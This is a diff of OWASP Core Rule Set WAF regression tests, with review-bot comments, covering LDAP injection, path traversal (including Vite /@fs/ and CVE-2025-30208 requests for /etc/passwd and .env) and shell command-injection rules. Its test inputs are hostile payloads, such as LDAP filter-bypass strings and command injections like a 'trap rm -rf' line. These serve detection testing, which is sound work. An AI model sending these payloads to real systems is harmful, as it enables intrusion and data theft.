@@ -17,12 +22,13 @@ tests: method: POST data: "foo=(%26(objectCategory=computer) (userAccountControl:1.2.840.113556.1.4.803:=8192))" uri: "/" - version: "HTTP/1.1" output: log: - no_expect_ids: [921200] + no_expect_ids: + - 921200 + - test_id: 2 - desc: "Testing for FP, this should not trigger" + desc: "False positive: LDAP filter with objectSID, valid SID format" stages: - input: dest_addr: "127.0.0.1" @@ -34,12 +40,13 @@ tests: method: POST data: "foo=(objectSID=S-1-5-21-73586283-152049171-839522115-1111)" uri: "/" - version: "HTTP/1.1" output: log: - no_expect_ids: [921200] + no_expect_ids: + - 921200 + - test_id: 3 - desc: "Testing for FP, this should not trigger" + desc: "False positive: LDAP filter with userAccountControl and groupType, valid group query" stages: - input: dest_addr: "127.0.0.1" 
@@ -51,12 +58,173 @@ tests: method: POST data: "foo=(userAccountControl:1.2.840.113556.1.4.803:=67108864)(%26(objectCategory=group)(groupType:1.2.840.113556.1.4.803:=2147483648))" uri: "/" - version: "HTTP/1.1" output: log: - no_expect_ids: [921200] + no_expect_ids: + - 921200 + + # --- Additional FP tests --- - test_id: 4 - desc: "Testing for rule, this should trigger" + desc: "False positive: Simple alphanumeric query parameter, no LDAP syntax" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?username=johndoe" + output: + log: + no_expect_ids: + - 921200 + + - test_id: 5 + desc: "False positive: Parentheses in mathematical expression, not LDAP related" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?formula=(a+b)*c" + output: + log: + no_expect_ids: + - 921200 + + - test_id: 6 + desc: "False positive: Email address in query parameter, standard format" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?email=user@example.com" + output: + log: + no_expect_ids: + - 921200 + + - test_id: 7 + desc: "False positive: Standard URL query parameters with ampersand, no LDAP syntax" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?a=1&b=2&c=3" + output: + log: + no_expect_ids: + - 921200 + + - test_id: 8 + desc: "False positive: Pipe character in search term, not LDAP syntax" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?search=foo|bar" + output: + log: + no_expect_ids: + - 921200 + + - 
test_id: 9 + desc: "False positive: Balanced parentheses in arithmetic expression" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?expr=(1+2)+(3+4)" + output: + log: + no_expect_ids: + - 921200 + + - test_id: 10 + desc: "False positive: Exclamation mark in text, not LDAP related" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?message=Hello!World" + output: + log: + no_expect_ids: + - 921200 + + - test_id: 11 + desc: "False positive: Tilde in file path, standard Unix path" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/~user/file.txt" + output: + log: + no_expect_ids: + - 921200 + + - test_id: 12 + desc: "False positive: Colon in time format, not LDAP syntax" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?time=12:30:45" + output: + log: + no_expect_ids: + - 921200 + + # + # === Positive Tests (should trigger rule 921200) === + # + + # --- Existing positive tests from original file --- + # Pattern: )( with boolean operator + - test_id: 13 + desc: "LDAP injection: close parenthesis followed by encoded AND operator, classic injection pattern" stages: - input: dest_addr: "127.0.0.1" @@ -68,12 +236,14 @@ tests: data: "foo=bar)(%26)" uri: "/" port: 80 - version: "HTTP/1.1" output: log: - expect_ids: [921200] - - test_id: 5 - desc: "Testing for rule, this should trigger" + expect_ids: + - 921200 + + # Pattern: )(attr=* + - test_id: 14 + desc: "LDAP injection: close parenthesis followed by uid wildcard filter, filter manipulation" stages: - input: dest_addr: "127.0.0.1" 
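Review bot: Tests 5 and 9 claim to exercise arithmetic expressions, but an unencoded `+` in a query string is decoded to a space by the engine's argument parsing, so the rule sees `(a b)*c` and `(1 2) (3 4)` rather than the literal plus the `desc` describes; use `uri: "/?formula=(a%2Bb)*c"` and `uri: "/?expr=(1%2B2)%2B(3%2B4)"` if the plus is the point, or reword the descriptions. Test 8 sends a raw `|` in the request line while the positive tests later in this file percent-encode the same character as `%7C`; a bare pipe may be encoded or rejected by the client or server before the WAF runs, so `uri: "/?search=foo%7Cbar"` keeps the negative meaningful. Most of the new negatives are single characters (`!`, `~`, `:`) that are unlikely near-misses for an injection pattern; a legitimate, balanced filter such as `(cn=johndoe)` would guard more of the rule's boundary, in the way the pre-existing tests 1–3 do.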
@@ -85,12 +255,14 @@ tests: data: "foo=printer)(uid=*)" uri: "/" port: 80 - version: "HTTP/1.1" output: log: - expect_ids: [921200] - - test_id: 6 - desc: "Testing for rule, this should trigger" + expect_ids: + - 921200 + + # Pattern: complex injection with multiple filters + - test_id: 15 + desc: "LDAP injection: complex filter manipulation using objectClass, multiple filters" stages: - input: dest_addr: "127.0.0.1" @@ -102,12 +274,14 @@ tests: data: "foo=void)(objectClass=users))(%26(objectClass=void)" uri: "/" port: 80 - version: "HTTP/1.1" output: log: - expect_ids: [921200] - - test_id: 7 - desc: "Testing for rule, this should trigger" + expect_ids: + - 921200 + + # Pattern: )!(attr=* + - test_id: 16 + desc: "LDAP injection: NOT operator with sn wildcard, filter negation" stages: - input: dest_addr: "127.0.0.1" @@ -119,12 +293,14 @@ tests: data: "foo=eb9adbd87d)!(sn=*" uri: "/" port: 80 - version: "HTTP/1.1" output: log: - expect_ids: [921200] - - test_id: 8 - desc: "Testing for rule, this should trigger" + expect_ids: + - 921200 + + # Pattern: *)!(attr=* + - test_id: 17 + desc: "LDAP injection: wildcard value followed by NOT operator, filter negation" stages: - input: dest_addr: "127.0.0.1" @@ -136,12 +312,14 @@ tests: data: "foo=*)!(sn=*" uri: "/" port: 80 - version: "HTTP/1.1" output: log: - expect_ids: [921200] - - test_id: 9 - desc: "Testing for rule, this should trigger" + expect_ids: + - 921200 + + # Pattern: )(uid=*))(|(uid=* + - test_id: 18 + desc: "LDAP injection: complex OR injection with multiple uid filters, chaining filters" stages: - input: dest_addr: "127.0.0.1" 
@@ -153,12 +331,14 @@ tests: data: "foo=*)(uid=*))(|(uid=*" uri: "/" port: 80 - version: "HTTP/1.1" output: log: - expect_ids: [921200] - - test_id: 10 - desc: "Testing for rule, this should trigger" + expect_ids: + - 921200 + + # Pattern: )(cn>=value - greater-than-equals comparison + - test_id: 19 + desc: "LDAP injection: greater-than-equals comparison operator in filter, privilege escalation attempt" stages: - input: dest_addr: "127.0.0.1" 
@@ -170,7 +350,210 @@ tests: data: "foo=aaa*aaa)(cn>=bob)" uri: "/" port: 80 - version: "HTTP/1.1" output: log: - expect_ids: [921200] + expect_ids: + - 921200 + + # --- Additional positive tests for better coverage --- + + # Pattern: )(attr<= - less-than-equals comparison + - test_id: 20 + desc: "LDAP injection: less-than-equals comparison operator in filter, privilege restriction attempt" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?filter=value)(gidNumber%3C%3D100" + output: + log: + expect_ids: + - 921200 + + # Pattern: )(attr~= - approximate match + - test_id: 21 + desc: "LDAP injection: approximate match operator in filter, fuzzy search manipulation" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?name=john)(sn~%3Dsmith" + output: + log: + expect_ids: + - 921200 + + # Pattern: )(| - OR operator injection + - test_id: 22 + desc: "LDAP injection: OR operator injection, filter chaining for bypass" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?user=admin)(|" + output: + log: + expect_ids: + - 921200 + + # Pattern: ))((& - double close-open with AND + - test_id: 23 + desc: "LDAP injection: double parenthesis escape with AND operator, advanced filter manipulation" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?q=test))(%26(objectClass%3D*" + output: + log: + expect_ids: + - 921200 + + # Pattern: &(attr= - direct AND with new filter + - test_id: 24 + desc: "LDAP injection: AND operator with new filter attribute, filter expansion" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: 
"localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?param=val)%26(cn%3Dadmin" + output: + log: + expect_ids: + - 921200 + + # Pattern: |(attr= - direct OR with new filter + - test_id: 25 + desc: "LDAP injection: OR operator with new filter attribute, filter expansion" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?param=val)%7C(uid%3D*" + output: + log: + expect_ids: + - 921200 + + # Real-world attack: Joomla CVE-2017-14596 + - test_id: 26 + desc: "LDAP injection: Joomla CVE-2017-14596 style attack, OR operator with password wildcard" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?username=admin)(%7C(password%3D*" + output: + log: + expect_ids: + - 921200 + + # Cookie-based injection + - test_id: 27 + desc: "LDAP injection: attack via cookie value, filter manipulation in session" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + Cookie: "session=value)(uid=*" + method: "GET" + port: 80 + uri: "/" + output: + log: + expect_ids: + - 921200 + + # Whitespace evasion with URL encoding + - test_id: 28 + desc: "LDAP injection: whitespace evasion using URL-encoded spaces between filters" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: "/?q=test)%20(%20%26%20" + output: + log: + expect_ids: + - 921200 + + # Tab character evasion + - test_id: 29 + desc: "LDAP injection: tab character as whitespace evasion between filters" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: "GET" + port: 80 + uri: 
"/?q=test)%09(%09|" + output: + log: + expect_ids: + - 921200 + + # Authentication bypass attempt + - test_id: 30 + desc: "LDAP injection: authentication bypass attempt via POST, AND operator with objectClass wildcard" + stages: + - input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + port: 80 + uri: "/login" + data: "username=admin)(%26(objectClass%3D*)&password=anything" + output: + log: + expect_ids: + - 921200 diff --git a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml index 80eb80460e..db273a28ef 100644 --- a/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml +++ b/tests/regression/tests/REQUEST-930-APPLICATION-ATTACK-LFI/930130.yaml @@ -1,6 +1,6 @@ --- meta: - author: "Andrew Howe, azurit, Esad Cetiner" + author: "Andrew Howe, azurit, Esad Cetiner, Roberto Di Sisto, touchweb_vincent" rule_id: 930130 tests: - test_id: 1 
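Review bot: Test 22 sends the OR operator raw (`uri: "/?user=admin)(|"`) while tests 25 and 26 percent-encode the same character as `%7C`; a bare `|` is not a valid URI character and may be encoded or rejected by go-ftw or the server before the rule runs, so `uri: "/?user=admin)(%7C"` makes the test exercise the engine rather than the transport. Tests 28 and 29 decode to `test) ( & ` and `test)\t(\t|` — an operator with no attribute filter behind it — so if the rule needs a comparison after the operator they pass only by the shape of the regex; the `# Whitespace evasion` comments above them would be more useful stating which sub-pattern each relies on, as the `# Pattern:` comments on tests 20–25 do. The "privilege escalation attempt" and "privilege restriction attempt" phrases in the `desc` of tests 19 and 20 read as claims about impact that a `>=`/`<=` comparison does not establish; "greater-than-or-equal comparison in injected filter" is enough.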
@@ -53,3 +53,99 @@ tests:
 output:
 log:
 expect_ids: [930130]
+ - test_id: 4
+ desc: "Vite.js /@fs/ path traversal (CVE-2025-30208)"
+ stages:
+ - input:
+ dest_addr: "127.0.0.1"
+ method: "GET"
+ port: 80
+ headers:
+ User-Agent: "OWASP CRS test agent"
+ Host: "localhost"
+ Accept: "*/*"
+ uri: "/@fs/etc/passwd"
+ version: "HTTP/1.1"
+ output:
+ log:
+ expect_ids: [930130]
+ - test_id: 5
+ desc: "Vite.js /@fs/ path traversal - .env file"
+ stages:
+ - input:
+ dest_addr: "127.0.0.1"
+ method: "GET"
+ port: 80
+ headers:
+ User-Agent: "OWASP CRS test agent"
+ Host: "localhost"
+ Accept: "*/*"
+ uri: "/@fs/.env"
+ version: "HTTP/1.1"
+ output:
+ log:
+ expect_ids: [930130]
+ - test_id: 6
+ desc: "Vite.js /@id/ module exploit"
+ stages:
+ - input:
+ dest_addr: "127.0.0.1"
+ method: "GET"
+ port: 80
+ headers:
+ User-Agent: "OWASP CRS test agent"
+ Host: "localhost"
+ Accept: "*/*"
+ uri: "/@id/__x00__?import"
+ version: "HTTP/1.1"
+ output:
+ log:
+ expect_ids: [930130]
+ - test_id: 7
+ desc: "Unauthorized attempt to access wp-content/debug.log"
+ stages:
+ - input:
+ dest_addr: "127.0.0.1"
+ method: "GET"
+ port: 80
+ headers:
+ User-Agent: "OWASP CRS test agent"
+ Host: "localhost"
+ Accept: "*/*"
+ uri: "/wp-content/debug.log"
+ version: "HTTP/1.1"
+ output:
+ log:
+ expect_ids: [930130]
+ - test_id: 8
+ desc: "Unauthorized attempt to access wp-content/error.log"
+ stages:
+ - input:
+ dest_addr: "127.0.0.1"
+ method: "GET"
+ port: 80
+ headers:
+ User-Agent: "OWASP CRS test agent"
+ Host: "localhost"
+ Accept: "*/*"
+ uri: "/wp-content/error.log"
+ version: "HTTP/1.1"
+ output:
+ log:
+ expect_ids: [930130]
+ - test_id: 9
+ desc: "Unauthorized attempt to access wp-content/errors.log"
+ stages:
+ - input:
+ dest_addr: "127.0.0.1"
+ method: "GET"
+ port: 80
+ headers:
+ User-Agent: "OWASP CRS test agent"
+ Host: "localhost"
+ Accept: "*/*"
+ uri: "/wp-content/errors.log"
+ version: "HTTP/1.1"
+ output:
+ log:
+ expect_ids: [930130]
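Review bot: All six new tests are positives; nothing asserts that ordinary Vite dev-server traffic such as `/@vite/client` stays unblocked, so a stage with `uri: "/@vite/client"` and `no_expect_ids: [930130]` would show the match is specific to `/@fs/` and `/@id/` rather than to every `/@` path (whether the data file lists the prefix or the full path is not visible here, which is exactly why the negative is worth having). Test 6's `desc: "Vite.js /@id/ module exploit"` should cite the advisory the `__x00__?import` payload comes from, as test 4 does with CVE-2025-30208, since it is a different bypass from the `/@fs/` traversal and the next maintainer will otherwise have to rediscover it. The WordPress tests 7–9 would be cleaner as one `desc` style ("Restricted file access: wp-content/error.log") — "Unauthorized attempt" asserts intent the rule cannot know.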
diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml index 76c23d6eb8..858b3b6c62 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml @@ -1,6 +1,6 @@ --- meta: - author: "emphazer, azurit" + author: "emphazer, azurit, touchweb_vincent" rule_id: 931131 tests: - test_id: 1 @@ -19,3 +19,19 @@ tests: output: log: expect_ids: [931131] + - test_id: 2 + desc: Remote File Inclusion Attack (931131) with same origin domain on REQUEST_FILENAME + stages: + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/https://example.com/" + version: HTTP/1.1 + output: + log: + expect_ids: [931131] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml index 395e5fa7da..4c5f07db49 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932220.yaml @@ -5,23 +5,6 @@ meta: rule_id: 932220 tests: - test_id: 1 - desc: "TEST=echo | php7.4" - stages: - - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "TEST=echo | gcc7.4" - version: HTTP/1.1 - output: - log: - expect_ids: [932220] - - test_id: 2 desc: "TEST=echo | ${gcc7.4}gcc7.4" stages: - input: @@ -38,7 +21,7 @@ tests: output: log: expect_ids: [932220] - - test_id: 3 + - test_id: 2 desc: "whxami|sh+``" stages: - input: 
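Review bot: The new 931131 test pins that a reference to the request's own host (`Host: example.com` with `uri: "/get/https://example.com/"`) still fires the rule, but neither the `desc` nor a comment says why a same-origin URL in the path is treated as an attack rather than as the classic off-domain false positive; if that is the rule's design, a comment such as `# same-origin references in REQUEST_FILENAME are intentionally still matched` above the test stops the next reader from "fixing" it. The stage also mixes unquoted scalars (`dest_addr: 127.0.0.1`, `Host: example.com`, `version: HTTP/1.1`) and a long unquoted `Accept:` value with the quoted form used throughout the other files in this change; yamllint accepts both, but the unquoted `Accept` line contains `;` and `,` and is easy to break on edit, so quoting it matches the rest of the suite.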
@@ -55,7 +38,7 @@ tests: output: log: expect_ids: [932220] - - test_id: 4 + - test_id: 3 desc: | Test for BB finding 9P5LL13Y echo "foo;whxam"i | tr x o | sh #" @@ -75,7 +58,7 @@ tests: output: log: expect_ids: [932220] - - test_id: 5 + - test_id: 4 desc: "Block evasion using here string" stages: - input: @@ -93,7 +76,7 @@ tests: output: log: expect_ids: [932220] - - test_id: 6 + - test_id: 5 desc: "Block evasion using here string with space" stages: - input: @@ -111,7 +94,7 @@ tests: output: log: expect_ids: [932220] - - test_id: 7 + - test_id: 6 desc: "Block evasion using here string with single quotes" stages: - input: @@ -129,7 +112,7 @@ tests: output: log: expect_ids: [932220] - - test_id: 8 + - test_id: 7 desc: "Block evasion using here string with double quotes" stages: - input: @@ -147,7 +130,7 @@ tests: output: log: expect_ids: [932220] - - test_id: 9 + - test_id: 8 desc: "Block evasion using here string with command substitution" stages: - input: @@ -165,7 +148,7 @@ tests: output: log: expect_ids: [932220] - - test_id: 10 + - test_id: 9 desc: "Block `time` prefix" stages: - input: @@ -183,7 +166,7 @@ tests: output: log: expect_ids: [932220] - - test_id: 11 + - test_id: 10 desc: "Block `strace` prefix" stages: - input: @@ -201,7 +184,7 @@ tests: output: log: expect_ids: [932220] - - test_id: 12 + - test_id: 11 desc: "Block `nohup` prefix" stages: - input: diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml index fa2864d9a3..4cec131e89 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932230.yaml @@ -1113,7 +1113,7 @@ tests: User-Agent: "OWASP CRS test agent" Host: "localhost" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,ima> - data: "arg=;rmt" + data: "arg=;rmt%20--version" version: "HTTP/1.1" output: log: 
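Review bot: Changing the 932230 payload from `arg=;rmt` to `arg=;rmt%20--version` keeps the positive green but silently records that the bare command no longer matches, presumably because the rule now expects an argument after the command; nothing in the file asserts that, so add a stage with `data: "arg=;rmt"` and `no_expect_ids: [932230]` so the relaxation is deliberate and visible rather than an accident of the data file. The same applies to the tests this change deletes outright in 932220, 932232 and 932236 (`| gcc7.4`, `;ps`, `&aptitude`, the `;top` entity case): if those commands moved to another rule's list the tests should move with them, and if they were dropped a negative test is the only record that the drop was intended. The `...ima>` truncation in the `Accept` context line is a rendering artefact of the diff view, not the file.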
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml index e3398ec36a..93c03688b7 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932232.yaml @@ -5,23 +5,6 @@ meta: rule_id: 932232 tests: - test_id: 1 - desc: "/?arg=;ps" - stages: - - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=%3Bps" - version: HTTP/1.1 - output: - log: - expect_ids: [932232] - - test_id: 2 desc: "/?arg=|vi (x" stages: - input: @@ -38,7 +21,7 @@ tests: output: log: expect_ids: [932232] - - test_id: 3 + - test_id: 2 desc: "/?arg=&w (x" stages: - input: @@ -55,24 +38,7 @@ tests: output: log: expect_ids: [932232] - - test_id: 4 - desc: "/?arg=&aptitude" - stages: - - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=%26aptitude" - version: HTTP/1.1 - output: - log: - expect_ids: [932232] - - test_id: 5 + - test_id: 3 desc: Remote Command Execution bypass with time stages: - input: @@ -90,7 +56,7 @@ tests: output: log: expect_ids: [932232] - - test_id: 6 + - test_id: 4 desc: Remote Command Execution bypass with time negative test stages: - input: @@ -108,7 +74,7 @@ tests: output: log: no_expect_ids: [932232] - - test_id: 7 + - test_id: 5 desc: Remote Command Injection test for BB finding 935E1D91 - time evasion attempt stages: - input: 
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml
index e9cf92a2a3..ecb2e7b16a 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932235.yaml
@@ -913,3 +913,40 @@ tests:
 output:
 log:
 expect_ids: [932235]
+ - test_id: 52
+ desc: "Match ;trap 'rm -rf file.txt' SIGEXIT"
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ method: POST
+ port: 80
+ uri: "/post"
+ version: HTTP/1.1
+ data: "arg=%3Btrap%20%27rm%20-rf%20file.txt%27%20SIGEXIT"
+ output:
+ log:
+ expect_ids: [932235]
+ - test_id: 53
+ desc: |
+ False Positive:
+ Don't block invalid command `null` (Might come from unix-shell.data)
+ stages:
+ - input:
+ dest_addr: 127.0.0.1
+ headers:
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ method: POST
+ port: 80
+ uri: "/post"
+ version: HTTP/1.1
+ data: |
+ code=time null space
+ output:
+ log:
+ no_expect_ids: [932235]
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml
index ab0112299a..eaaece17e5 100644
--- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml
+++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932236.yaml
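Review bot: Test 53 writes the body as a literal block scalar, `data: |` followed by `code=time null space`, and `|` keeps the trailing newline, so the request body actually sent is `code=time null space\n` rather than the form value the description implies; write it as `data: "code=time null space"` (or `data: |-` if a block scalar is wanted) so the false-positive check exercises the same bytes a browser would send. The block-scalar `desc:` on the same test is fine for prose, but quoting `data` inline also matches test 52 directly above it, which uses the quoted form. Test 52's `desc` could note that `SIGEXIT` is used deliberately as a shell pseudo-signal spelling, since a reader may otherwise take it for a typo of `EXIT`.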
@@ -585,26 +585,6 @@ tests: log: expect_ids: [932236] - test_id: 32 - desc: RCE ;top with html entities two digit decimal of 59 (;) - stages: - - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate, br - Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 - Content-Type: application/x-www-form-urlencoded - method: POST - port: 80 - uri: "/post" - data: "arg=%26%2359%3B+;top" - version: HTTP/1.1 - output: - log: - expect_ids: [932236] - - test_id: 33 desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the end stages: - input: @@ -624,7 +604,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 34 + - test_id: 33 desc: Like rule True Negative Rule Integrity 9 but the html entity is concatenation with RCE at the beginning stages: - input: @@ -644,7 +624,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 35 + - test_id: 34 desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the end stages: - input: @@ -664,7 +644,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 36 + - test_id: 35 desc: Like rule True Negative Rule Integrity 10 but the html entity is concatenation with RCE at the beginning stages: - input: @@ -684,7 +664,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 37 + - test_id: 36 desc: Like rule True Negative Rule Integrity 11 but the html entity is concatenation with RCE at the beginning stages: - input: @@ -704,7 +684,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 38 + - test_id: 37 desc: "Unix command injection" stages: - input: @@ -721,7 +701,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 39 + - test_id: 38 desc: "Unix command injection" stages: - input: 
@@ -738,7 +718,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 40 + - test_id: 39 stages: - input: dest_addr: "127.0.0.1" @@ -753,7 +733,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 41 + - test_id: 40 stages: - input: dest_addr: "127.0.0.1" @@ -769,7 +749,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 42 + - test_id: 41 desc: Remote Command Injection test for BB finding 935E1D91 stages: - input: @@ -787,7 +767,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 43 + - test_id: 42 desc: Remote Command Injection test for BB finding 935E1D91 - time evasion attempt stages: - input: @@ -805,7 +785,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 44 + - test_id: 43 desc: "FP with word comment" stages: - input: @@ -821,7 +801,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 45 + - test_id: 44 desc: "FP with word settings" stages: - input: @@ -837,7 +817,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 46 + - test_id: 45 desc: False positive against "time" stages: - input: @@ -856,7 +836,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 47 + - test_id: 46 desc: False positive against "more" stages: - input: @@ -875,7 +855,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 48 + - test_id: 47 desc: "FP with word environment" stages: - input: @@ -891,7 +871,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 49 + - test_id: 48 desc: "FP with word performance" stages: - input: @@ -907,7 +887,7 @@ tests: output: log: no_expect_ids: [932236] - - test_id: 50 + - test_id: 49 desc: "Block execution of env command with arguments" stages: - input: @@ -924,7 +904,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 51 + - test_id: 50 desc: "Block execution of perf command with arguments" stages: - input: @@ -941,7 +921,7 @@ tests: output: log: expect_ids: [932236] - - test_id: 52 + - test_id: 51 desc: "Block evasion using here string" stages: - input: 
